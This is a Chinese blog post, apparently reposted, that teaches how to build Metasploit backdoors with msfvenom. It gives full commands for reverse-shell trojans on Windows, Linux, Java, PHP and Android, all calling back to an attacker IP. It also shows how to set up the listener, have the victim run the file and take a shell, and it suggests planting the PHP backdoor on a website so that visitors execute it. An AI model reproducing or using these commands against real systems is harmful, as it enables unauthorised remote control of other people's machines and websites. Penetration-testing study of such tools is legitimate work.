当前位置: 首页 > news >正文

msf生成php,MSF-Shellcode生成和使用

1使用环境

Kali 2.0

msfvenom

2Msfvenom参数说明

msfvenom –h    查看帮助

说明:

Options:

-p, --payload            指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定

-l, --list       [module_type]   列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all

-n, --nopsled             为payload预先指定一个NOP滑动长度

-f, --format              指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)

-e, --encoder    [encoder]       指定需要使用的encoder(编码器)

-a, --arch          指定payload的目标架构

--platform          指定payload的目标平台

-s, --space               设定有效攻击荷载的最大长度

-b, --bad-chars             设定规避字符集,比如: '\x00\xff'

-i, --iterations           指定payload的编码次数

-c, --add-code              指定一个附加的win32 shellcode文件

-x, --template              指定一个自定义的可执行文件作为模板

-k, --keep                        保护模板程序的动作,注入的payload作为一个新的进程运行

--payload-options            列举payload的标准选项

-o, --out                  保存payload

-v, --var-name              指定一个自定义的变量,以确定输出格式

--shellest                   最小化生成payload

-h, --help                        查看帮助选项

--help-formats               查看msf支持的输出格式列表

2.1命常用帮助命令

msfvenom --help-formats     查看有哪些格式输出

7e9415799f0efecaea84ce87a3aad5f8.png

msfvenom -l encoders       查看有哪些编码方式

3Metasploit生成多种后门

Metasploit可以生成各种格式的后门,有php、exe(windows下后门)、linux环境下后门,java后门、androiw后门等等。

可以生成asp、aspx、php、jsp、war、exe等多种类型

现在已经没有msfpayload的命令了,换成msfvenom了。里面集成了msfpayload和msfencode

3.1生成window下后门程序

使用以下模块生成windows系统下后门程序。

windows/meterpreter/reverse_tcp

生成木马程序时如果可以指定也可以不指定--arch x86 --platform windows,不指定则会报错提示,不用理会,-p后写指定的payload,-f后指定文件格式。

msfvenom -p windows/meterpreter/reverse_tcpLHOST=192.168.1.115 LPORT=1234 -f exe > /aaa.exe

a57f1237a311780ea94e306e8df2db7d.png

或者指定参数如下:

使用生成木马命令:

msfvenom -p windows/meterpreter/reverse_tcp--arch x86 --platform windows LHOST=192.168.1.115 LPORT=1234 -f exe >/aaa.exe

372ac36345354ce4ee7ad75ac824bfec.png

被中木马的机器IP地址是192.168.1.123

把在kali的根目录生产的木马程序aaa.exe文件拷贝到被攻击的机器上面去192.168.1.123上。

0768917b489c5e35034ba6633aad4555.png

======================================================

设置监听:

使用监听模块:use exploit/multi/handler

6cca21d37fcdc9a2201973ca5a81d642.png

使用payload

e3efe21614765b5b2db4157615a14417.png

ca7246170ba421d96d9d380d14ec62cf.png

1163c40b9455273fd0977444d564a611.png

410ebabd051f72db2a772634acf10380.png

执行监听

80becf47269e97e532b79d78750c76b4.png

=================================================

在被攻击的机器上面双机运行aaa.exe木马,此时在kali上面观看结果如下:

说明192.168.1.123已经被中木马了,可以控制此机器了。

f0895e9037775fe3a0156cd6d92ed671.png

通过输入shell来进入控制台控制机器。

48e317ecb8f54d8ec74261f77014f10b.png

查看机器的ip地址是否是192.168.1.123

d51f71c28647bda8b3f485ce38170768.png

3.2生成linux下后门程序

使用以下模块生成linux后门程序,操作方法跟windows后门使用一样。

linux/x86/shell_reverse_tcp

与windows系统唯一的区别是在linux下生成的木马需要给这个程序可执行的权限,通过使用以下命令chmod:

Chmod +x 程序名

在linux下执行木马程序命令:

./程序名

3.3生成Java后门程序

Java程序在windows下和在linux下都可以生效执行的

使用以下模块生成后门程序:

java/meterpreter/reverse_tcp

生成木马命令:

msfvenom -p java/meterpreter/reverse_tcplhost=192.168.1.115 lport=2222 x> /jar.jar

c2f453338b7f815c4a1407a4f8a980c8.png

3.4生成PHP后门程序

使用模块:

php/meterpreter/reverse_tcp

生成木马命令:

msfvenom -p php/meterpreter/reverse_tcplhost=192.168.1.115 lport=2222 x> /php.php

285eaa0cb470720fe32c4fb66053131d.png

把生成的木马php文件放到网站上面,当别人访问的时候就会执行。

3.5生成Android后门程序

使用模块:

android/meterpreter/reverse_tcp

生成木马命令:

msfvenom -p android/meterpreter/reverse_tcplhost=192.168.1.115 lport=2222 x> /android.apk

af98fcb8d658736d7f6f102da1add3d2.png

本文转自 老鹰a  51CTO博客,原文链接:http://blog.51cto.com/laoyinga/1880673

相关文章:

  • 如何在首次启动 Linux 虚拟机时对其进行自定义
  • php 比nodejs 容易学,粗大事了:花两天时间学习了 Go 语言,发现比 Node.js 高不知多少去了...
  • php获取cname解析结果,如何检测来自CNAME子域的传入请求(使用PHP脚本)?
  • Ubuntu16.04系统中Nmon的安装
  • CentOS 7 网络磁盘挂载到本地 并测试传输速度
  • 数字图像处理灰度变换java,数字图像处理:图像的灰度变换(Matlab实现)
  • java math 最大,在Java.lang包的Math类中,求最大值的方法为(选一项)
  • 递推算法
  • java方法传递对象,java面向对象-3-方法参数传递
  • iOS 对UIAlertController内的输入框进行输入监听,实时改变确定、取消按钮颜色
  • php url别名,编写PHP程序实现Drupal中pathauto模块的批量生成URL别名(Alias)
  • Spark记录-spark与storm比对与选型(转载)
  • matlab 实验七,matlab 实验七 数字填图问题
  • matlab corrcoef 原理,cov函数 corrcoef函数【Matlab】
  • 彻底解决Oracle unable to create INITIAL extent for segment in tablespace xx
  • 【comparator, comparable】小总结
  • exif信息对照
  • JDK 6和JDK 7中的substring()方法
  • linux学习笔记
  • Objective-C 中关联引用的概念
  • Storybook 5.0正式发布:有史以来变化最大的版本\n
  • Sublime Text 2/3 绑定Eclipse快捷键
  • 初识MongoDB分片
  • 从零开始在ubuntu上搭建node开发环境
  • 当SetTimeout遇到了字符串
  • 更好理解的面向对象的Javascript 1 —— 动态类型和多态
  • 技术发展面试
  • 看图轻松理解数据结构与算法系列(基于数组的栈)
  • 两列自适应布局方案整理
  • 马上搞懂 GeoJSON
  • 前端每日实战 2018 年 7 月份项目汇总(共 29 个项目)
  • 深入体验bash on windows,在windows上搭建原生的linux开发环境,酷!
  • 用jquery写贪吃蛇
  • 字符串匹配基础上
  • Semaphore
  • !!【OpenCV学习】计算两幅图像的重叠区域
  • #stm32整理(一)flash读写
  • (2)(2.10) LTM telemetry
  • (C++)栈的链式存储结构(出栈、入栈、判空、遍历、销毁)(数据结构与算法)
  • (ZT)薛涌:谈贫说富
  • (多级缓存)多级缓存
  • (附源码)springboot工单管理系统 毕业设计 964158
  • (亲测)设​置​m​y​e​c​l​i​p​s​e​打​开​默​认​工​作​空​间...
  • (三维重建学习)已有位姿放入colmap和3D Gaussian Splatting训练
  • (收藏)Git和Repo扫盲——如何取得Android源代码
  • (四)模仿学习-完成后台管理页面查询
  • (一)【Jmeter】JDK及Jmeter的安装部署及简单配置
  • (译) 理解 Elixir 中的宏 Macro, 第四部分:深入化
  • **python多态
  • .[backups@airmail.cc].faust勒索病毒的最新威胁:如何恢复您的数据?
  • .axf 转化 .bin文件 的方法
  • .NET CF命令行调试器MDbg入门(一)
  • .net core 依赖注入的基本用发
  • .Net MVC + EF搭建学生管理系统
  • .NET 使用 JustAssembly 比较两个不同版本程序集的 API 变化